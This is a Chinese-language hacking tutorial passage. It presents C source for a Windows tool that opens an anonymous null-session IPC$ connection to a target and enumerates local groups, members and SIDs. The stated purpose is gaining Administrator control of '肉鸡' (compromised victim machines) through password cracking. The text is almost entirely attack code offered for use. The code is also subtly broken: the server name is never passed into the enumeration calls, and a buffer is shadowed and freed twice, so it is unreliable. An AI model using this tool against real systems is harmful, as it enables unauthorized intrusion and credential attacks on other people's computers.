我们要取得肉鸡的控制权,首先必须有Administrator权限,获得权限的途径很多都是通过IPC$破解来获得用户密码. 我们看一下代码: #include <windows.h> #include <stdio.h> #include <lm.h> #pragma comment (lib, "Mpr.lib") #pragma comment (lib, "Netapi32.lib") void getuser(char *); void main( int argc, char *argv[ ] ) { //空用户名和密码 DWORD ret; char username[100] = "", password[100] = ""; char server[100] = "", ipc[100] = ""; NETRESOURCE NET; if (argc == 1) { exit(1); } strncpy(server,argv[1],100); printf("server: %s ", server); sprintf(ipc,"\\%s\ipc$",server); NET.lpLocalName = NULL; NET.lpProvider = NULL; NET.dwType = RESOURCETYPE_ANY; NET.lpRemoteName = (char*)&ipc; printf("setting up session... "); ret = WNetAddConnection2(&NET,(const char *)&password,(const char *)&username,0); //建立空连接 if (ret != ERROR_SUCCESS) { printf("IPC$ connect fail. "); exit(1); } else printf("IPC$ connect success. "); getuser((char*)&server); printf("Disconnect Server... "); ret = WNetCancelConnection2((char*)&ipc,0,TRUE); //断开IPC连接 if (ret != ERROR_SUCCESS) { printf("fail. "); exit(1); } else printf("success. "); exit (0); } void getuser(char *server) //取得用户的函数 { DWORD ret, read, total, resume = 0; int i; LPVOID buff; char comment[255]; wchar_t wserver[100]; do { ret = NetLocalGroupEnum(wserver, 1, (unsigned char **)&buff, MAX_PREFERRED_LENGTH, &read, &total, &resume); if (ret != NERR_Success && ret != ERROR_MORE_DATA) { printf("fail "); break; } PLOCALGROUP_INFO_1 info = (PLOCALGROUP_INFO_1) buff; for (i=0; i<read; i++) { printf("GROUP: %S ",info[i].lgrpi1_name); WideCharToMultiByte(CP_ACP, 0, info[i].lgrpi1_comment , -1, comment,255,NULL,NULL); printf(" COMMENT: %s ",comment); DWORD ret, read, total, resume = 0; ret = NetLocalGroupGetMembers((const unsigned short*)&wserver, info[i].lgrpi1_name, 2, (unsigned char **)&buff, 1024, &read, &total, &resume); if (ret != NERR_Success && ret != ERROR_MORE_DATA) { printf("fail "); break; } PLOCALGROUP_MEMBERS_INFO_2 info = (PLOCALGROUP_MEMBERS_INFO_2) buff; for (unsigned i=0; i<read; i++) { printf(" %S ", info[i].lgrmi2_domainandname); printf(" SID:%d ", info[i].lgrmi2_sid); printf(" SIDUSAGE:%d ",info[i].lgrmi2_sidusage); } NetApiBufferFree (buff); } NetApiBufferFree (buff); } while (ret == ERROR_MORE_DATA ); }